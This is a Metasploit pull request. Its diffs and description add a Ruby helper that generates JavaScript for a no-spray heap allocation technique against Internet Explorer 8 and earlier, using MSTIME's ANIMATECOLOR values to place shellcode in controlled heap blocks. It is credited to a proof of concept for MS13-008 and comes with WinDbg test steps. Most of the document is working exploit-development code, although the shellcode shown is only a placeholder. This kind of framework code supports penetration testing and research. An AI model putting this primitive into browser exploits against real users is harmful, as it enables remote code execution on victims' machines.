### PR TITLE
Adds function js_mstime_malloc

### DIFF
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -868,7 +868,7 @@ protected
 	#     <script>
 	#     #{js_mstime_malloc}
 	#
-	#     shellcode = "\u4141\u4141\u4141\u4141";
+	#     shellcode = unescape("%u4141%u4141%u4141%u4141%u4141");
 	#     offset    = 3;
 	#     s         = 0x58;
 	#     mstime_malloc({shellcode:shellcode,offset:offset,heapBlockSize:s,objId:oId});

--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -842,6 +842,71 @@ protected
 		|
 	end
 
+
+	#
+	# This function takes advantage of MSTIME's CTIMEAnimationBase::put_values function that's
+	# suitable for a no-spray technique.  There should be an allocation that contains an array of
+	# pointers to strings that we control, and each string should reside in its own buffer.
+	# Please note newer IEs (such as IE9), no longer support SMIL, therefore this only works on
+	# Internet Explorer 8 or prior.  Note that "mstime_malloc" also requires a rather specific
+	# writing style, so make sure you have the following before using:
+	#   * You must have the following at the beginning of your HTML file:
+	#     	<!doctype html>
+	#       <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
+	#   * You must have the following in <meta>:
+	#     	<meta>
+	#           <?IMPORT namespace="t" implementation="#default#time2">
+	#       </meta>
+	#
+	# The "mstime_malloc" JavaScript function supports the following arguments:
+	#   shellcode     => The shellcode to place.
+	#   offset        => Optional. The pointer index that points to the shellcode.
+	#   heapBlockSize => Object size.
+	#   objId         => The ID to your ANIMATECOLOR element.
+	#
+	# Example of using "js_mstime_malloc":
+	#     <script>
+	#     #{js_mstime_malloc}
+	#
+	#     shellcode = "\u4141\u4141\u4141\u4141";
+	#     offset    = 3;
+	#     s         = 0x58;
+	#     mstime_malloc({shellcode:shellcode,offset:offset,heapBlockSize:s,objId:oId});
+	#     </script>
+	#
+	def js_mstime_malloc
+		%Q|
+		function mstime_malloc(oArg) {
+			shellcode     = oArg.shellcode;
+			offset        = oArg.offset;
+			heapBlockSize = oArg.heapBlockSize;
+			objId         = oArg.objId;
+
+			if (shellcode     == undefined) { throw "Missing argument: shellcode"; }
+			if (offset        == undefined) { offset = 0; }
+			if (heapBlockSize == undefined) { throw "Size must be defined"; }
+			if (objId         == undefined) { throw "ANIMATECOLOR element must be defined"; }
+
+			buf = "";
+			for (i=0; i < heapBlockSize/4; i++) {
+				if (i == offset) {
+					if (i == 0) { buf += shellcode;       }
+					else        { buf += ";" + shellcode; }
+				}
+				else {
+					buf += ";cyan";
+				}
+			}
+
+			try {
+				e = document.getElementById(objId);
+				if (e == null) { throw "Invalid ANIMATECOLOR element"; }
+				e.values = buf;
+			} catch (e) {}
+		}
+		|
+	end
+
 	#
 	# This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty)
 	# function to trigger allocations by ntdll!RtlAllocateHeap.  It is based on Corelan's

--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -875,6 +875,8 @@ protected
 	#     </script>
 	#
 	def js_mstime_malloc
+		badchars = (0x47..0x5a).to_a.pack("C*") + (0x67..0x7a).to_a.pack("C*") 
+		rgb      = Rex::Text.rand_text_alphanumeric(6, badchars).downcase
 		%Q|
 		function mstime_malloc(oArg) {
 			shellcode     = oArg.shellcode;
@@ -894,7 +896,7 @@ protected
 					else        { buf += ";" + shellcode; }
 				}
 				else {
-					buf += ";cyan";
+					buf += ";##{rgb}";
 				}
 			}
 

--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -875,8 +875,6 @@ protected
 	#     </script>
 	#
 	def js_mstime_malloc
-		badchars = (0x47..0x5a).to_a.pack("C*") + (0x67..0x7a).to_a.pack("C*") 
-		rgb      = Rex::Text.rand_text_alphanumeric(6, badchars).downcase
 		%Q|
 		function mstime_malloc(oArg) {
 			shellcode     = oArg.shellcode;
@@ -896,15 +894,14 @@ protected
 					else        { buf += ";" + shellcode; }
 				}
 				else {
-					buf += ";##{rgb}";
+					buf += ";##{Rex::Text.rand_text_hex(6)}";
 				}
 			}
 
-			try {
-				e = document.getElementById(objId);
-				if (e == null) { throw "Invalid ANIMATECOLOR element"; }
-				e.values = buf;
-			} catch (e) {}
+			e = document.getElementById(objId);
+			if (e == null) { throw "Invalid ANIMATECOLOR element"; }
+			try { e.values = buf; }
+			catch (e) {}
 		}
 		|
 	end

--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -885,7 +885,6 @@ protected
 			if (shellcode     == undefined) { throw "Missing argument: shellcode"; }
 			if (offset        == undefined) { offset = 0; }
 			if (heapBlockSize == undefined) { throw "Size must be defined"; }
-			if (objId         == undefined) { throw "ANIMATECOLOR element must be defined"; }
 
 			buf = "";
 			for (i=0; i < heapBlockSize/4; i++) {
@@ -899,7 +898,12 @@ protected
 			}
 
 			e = document.getElementById(objId);
-			if (e == null) { throw "Invalid ANIMATECOLOR element"; }
+			if (e == null) {
+				eleId = "#{Rex::Text.rand_text_alpha(5)}"
+				acTag = "<t:ANIMATECOLOR id='"+ eleId  + "'/>"
+				document.body.innerHTML = document.body.innerHTML + acTag;
+				e = document.getElementById(eleId);
+			}
 			try { e.values = buf; }
 			catch (e) {}
 		}


### PR DESCRIPTION
This function takes advantage of MSTIME's CTIMEAnimationBase::put_values function that's suitable for a no-spray technique (based on wtfuzz's PoC for MS13-008).

How to test:

Attach windbg, setup this breakpoint (Win XP + IE8):

bu mstime!CTIMEAnimationBase::put_values+0x216 ".printf \"[*] Allocating for pointers: 0x%08x\",eax; .echo ; g"

And then run the JavaScript.  The breakpoint should give you an address, do a "dda [address]" to check results.

Here's a testcase for that:
https://gist.github.com/wchen-r7/ac29eb40fb33ddb5ab29
